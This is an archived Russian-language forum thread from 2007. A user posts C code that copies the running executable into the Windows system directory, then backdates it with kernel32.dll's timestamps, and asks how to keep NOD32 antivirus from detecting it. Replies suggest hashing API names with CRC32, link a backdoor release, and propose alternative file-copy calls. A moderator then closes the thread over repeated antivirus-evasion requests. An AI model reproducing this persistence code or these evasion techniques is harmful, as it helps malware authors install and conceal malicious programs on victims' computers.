CopyToSysDir() Помогите поправить [Архив]

Просмотр полной версии : CopyToSysDir() Помогите поправить

razzzar

02.07.2007, 20:25

Функция копирует ехе процесса в системную директорию. Мой нод32 ее палит. помогите испарвить, чтобы не ловилась.

// ---------------- [ Copy to system directory ] -------------- //

int CopyToSysDir(char * szBuff)
{
char szExe[256], szNewExe[256], szSysDir[256], szKernl[256], szCurDir[256];
HANDLE hFile;
FILETIME aTime, bTime, cTime;

if ( GetModuleFileName(NULL, szExe, 256) == 0 )
return 0;

if ( GetSystemDirectory(szSysDir, 256) == 0 )
return 0;

if ( GetCurrentDirectory(256, szCurDir) == 0 )
return 0;

if ( (strcmp(szSysDir, szCurDir) == 0) && (strcmp(szExe, EXE_NAME) == 0) )
return 0;

lstrcpy(szNewExe, szSysDir);
lstrcat(szNewExe, "\\");
lstrcat(szNewExe, EXE_NAME);

if ( CopyFile(szExe, szNewExe, FALSE) == 0 ) // палится в этом месте
return 0;

lstrcpy(szKernl, szSysDir);
lstrcat(szKernl, "\\");
lstrcat(szKernl, KERNEL32_DLL);

hFile = CreateFile(szKernl, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
if ( hFile != INVALID_HANDLE_VALUE )
{
GetFileTime(hFile, &aTime, &bTime, &cTime);
CloseHandle(hFile);
}
else
return 0;

hFile = CreateFile(szNewExe, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
if ( hFile != INVALID_HANDLE_VALUE )
{
SetFileTime(hFile, &aTime, &bTime, &cTime);
CloseHandle(hFile);
}
else
return 0;

memcpy(szBuff, szNewExe, 256);

return 1;
}

Ni0x

02.07.2007, 23:13

для начала убери прямой вызов апи, можешь использовать crc32

razzzar

03.07.2007, 00:40

а можно с примером?

Ni0x

03.07.2007, 01:01

http://hellknights.void.ru/releases/el-backdoor-small-v0.02.rar
в нем реализован поиск апи по crc32, разбирайся

razzzar

03.07.2007, 01:34

ок. спс.
а больше нету никаких способов изменить код, который палит антивирь? не обязательно тот, что я привел выше

Xserg

03.07.2007, 01:44

У меня MoveFileExA не палился.
Сейчас в лом опять NOD ставить, чтобы проверить и с установками экспериментировать.

KEZ

03.07.2007, 03:05

как понять палит? палит весь файл по ф-ии или его действия AMON файл-монитором?
ну скоипируй содержимое своего ЕХЕ в созданый в сис. дериктории файл
CreateFile(), WriteFile(), RedFile(), CloseHandle()

хотя, как видно, код ты просто скопипастил, непонимая что означает ни одна строчка.

_Great_

03.07.2007, 10:34

Блин, а ты как хотел? Конечно, палит.

Закрыто по причинам:

1) Ссылок дали достаточно. + еще дам: http://wasm.ru/
2) Блин, да задолбали темы как скрыться от АВ и фаеров. Думайте своей головой